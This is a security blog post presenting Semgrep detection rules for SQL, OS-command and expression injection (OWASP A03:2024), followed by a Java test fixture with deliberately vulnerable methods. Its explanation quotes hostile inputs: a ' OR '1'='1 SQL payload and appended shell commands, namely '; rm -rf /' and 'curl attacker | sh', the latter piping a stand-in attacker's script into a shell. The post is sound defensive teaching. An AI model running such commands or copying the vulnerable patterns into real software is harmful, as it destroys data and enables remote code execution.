Semgrep Rules OWASP A03:2024 – Injection (SQL/OS/Expression)
January 23, 2026


Salute,

Today I want to share with you Semgrep rules for injections according to OWASP A03:2024.

I think that I will periodically give examples so that they can be refined and reused.

Injection is a class of vulnerabilities in which untrusted data reaches an interpreter as part of a command or query and changes its meaning. It arises when the application does not validate input and builds dynamic queries by concatenating strings, so the data is passed straight to the interpreter without parameterization or escaping. (String concatenation means joining strings into one without altering their content.)

Typical A03 attack vectors

1. SQL injection: an SQL fragment is supplied in a query parameter, body, cookie or header. With SELECT * FROM users WHERE id = ' + id + ', passing id = ' OR '1'='1 makes the query return all records and opens the way to modifying them.

2. OS command injection: input reaches the OS through Runtime.exec, ProcessBuilder, system(), sh -c and the like, so an appended ; rm -rf / or && curl attacker | sh gives remote command execution on the server.

3. Expression / EL / OGNL injection: input is substituted into an expression engine and evaluated, so the expression can reach arbitrary objects, call methods, read files, execute commands and so on. The common principle: the input changes the structure of the command or query, and the interpreter performs an operation other than the one intended.

Example Semgrep rules for A03:2024

rules:
  - id: java-sqli-concat-critical
    languages: [java]
    severity: CRITICAL
    message: |
      OWASP A03:2024 (Injection) - possible SQL injection via string concatenation.
      Use PreparedStatement with bound parameters.
    # pattern-either is a logical OR: any one of the execute variants is enough.
    # (patterns: would be a logical AND of all three, so the rule would never fire.)
    pattern-either:
      - pattern: |
          $STMT = $CONN.createStatement();
          ...
          $STMT.executeQuery("SELECT " + $VAR);
      - pattern: |
          $STMT = $CONN.createStatement();
          ...
          $STMT.execute("SELECT " + $VAR);
      - pattern: |
          $STMT = $CONN.createStatement();
          ...
          $STMT.executeUpdate("SELECT " + $VAR);
    paths:
      include:
        - "**/*.java"
    metadata:
      owasp_top_10_2024: ["A03:2024-Injection"]
      cwe: ["CWE-89"]
      likelihood: "HIGH"
      impact: "HIGH"

  - id: java-sqli-prepared-misuse-high
    languages: [java]
    severity: HIGH
    message: |
      OWASP A03:2024 (Injection) - string concatenation inside prepareStatement().
      Use '?' placeholders and setXxx() instead.
    # A PreparedStatement only protects the parts of the query bound through '?'.
    pattern: |
      PreparedStatement $PSTMT = $CONN.prepareStatement("SELECT " + $VAR + " FROM " + $TABLE);
    paths:
      include:
        - "**/*.java"
    metadata:
      owasp_top_10_2024: ["A03:2024-Injection"]
      cwe: ["CWE-89"]
      likelihood: "MEDIUM"
      impact: "HIGH"

  - id: java-os-command-injection-runtime
    languages: [java]
    severity: CRITICAL
    message: |
      OWASP A03:2024 (Injection) - possible command injection via
      Runtime.getRuntime().exec()
    # Logical OR of the string form and the explicit argument-array form.
    pattern-either:
      - pattern: |
          Runtime.getRuntime().exec($CMD);
      - pattern: |
          Runtime.getRuntime().exec(new String[] { $A, $B, $C });
    paths:
      include:
        - "**/*.java"
    metadata:
      owasp_top_10_2024: ["A03:2024-Injection"]
      cwe: ["CWE-78"]
      likelihood: "HIGH"
      impact: "CRITICAL"

  - id: java-expression-language-injection
    languages: [java]
    severity: HIGH
    message: |
      OWASP A03:2024 (Injection) - dynamic compilation/execution of expressions.
    # Logical OR: Spring SpEL evaluation or any ScriptEngine-style eval() call.
    pattern-either:
      - pattern: |
          new org.springframework.expression.spel.standard.SpelExpressionParser().parseExpression($EXPR).getValue($CTX);
      - pattern: |
          $ENGINE.eval($EXPRESSION);
    paths:
      include:
        - "**/*.java"
    metadata:
      owasp_top_10_2024: ["A03:2024-Injection"]
      cwe: ["CWE-94"]
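As an added example (not code from the original post), here is a Semgrep test fixture for the four rules above, in the form `semgrep --test` expects. It assumes the rules are saved as a03-injection.yml next to it; the rule ids are the ones from the post, and every statement annotated with ruleid: must be flagged by that rule while every ok: statement must not be.

```java
// Semgrep test fixture (added example). Run:  semgrep --test --config a03-injection.yml .
// Flagged calls are written as plain expression statements so they match the
// ';'-terminated statement patterns in the rules exactly.
import java.sql.*;
import java.util.List;
import javax.script.*;

public class A03InjectionTest {

    static ResultSet searchUnsafe(Connection conn, String userQuery) throws SQLException {
        // The multi-statement pattern starts matching at createStatement(), so the
        // annotation belongs on the line before it, not before execute().
        // ruleid: java-sqli-concat-critical
        Statement stmt = conn.createStatement();
        stmt.execute("SELECT " + userQuery);
        return stmt.getResultSet();
    }

    static ResultSet searchSafe(Connection conn, String id) throws SQLException {
        // ok: java-sqli-concat-critical
        PreparedStatement ps = conn.prepareStatement("SELECT * FROM users WHERE id = ?");
        ps.setString(1, id); // bound parameter: data can never change the query structure
        return ps.executeQuery();
    }

    static void projectUnsafe(Connection conn, String col, String table) throws SQLException {
        // ruleid: java-sqli-prepared-misuse-high
        PreparedStatement ps = conn.prepareStatement("SELECT " + col + " FROM " + table);
        ps.executeQuery();
    }

    static void pingUnsafe(String host) throws java.io.IOException {
        // ruleid: java-os-command-injection-runtime
        Runtime.getRuntime().exec("ping -c 1 " + host);
    }

    static Process pingSafe(String host) throws java.io.IOException {
        // Allow-list the value, then pass an argument vector: no shell parses it.
        if (!host.matches("[A-Za-z0-9.-]{1,253}")) throw new IllegalArgumentException("bad host");
        // ok: java-os-command-injection-runtime
        return new ProcessBuilder(List.of("ping", "-c", "1", host)).start();
    }

    static void evalUnsafe(ScriptEngine engine, String expr) throws ScriptException {
        // ruleid: java-expression-language-injection
        engine.eval(expr);
    }
}
```

Two caveats the fixture makes visible: a string literal in a pattern must match exactly, so "SELECT " + $VAR does not catch "SELECT * FROM users WHERE id = '" + id (use "..." + $VAR to match any literal), and the os-command rule only covers Runtime.exec(), so ProcessBuilder call sites are not reported at all.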

#toolchain #sast #appsec #course #reco #techsolution
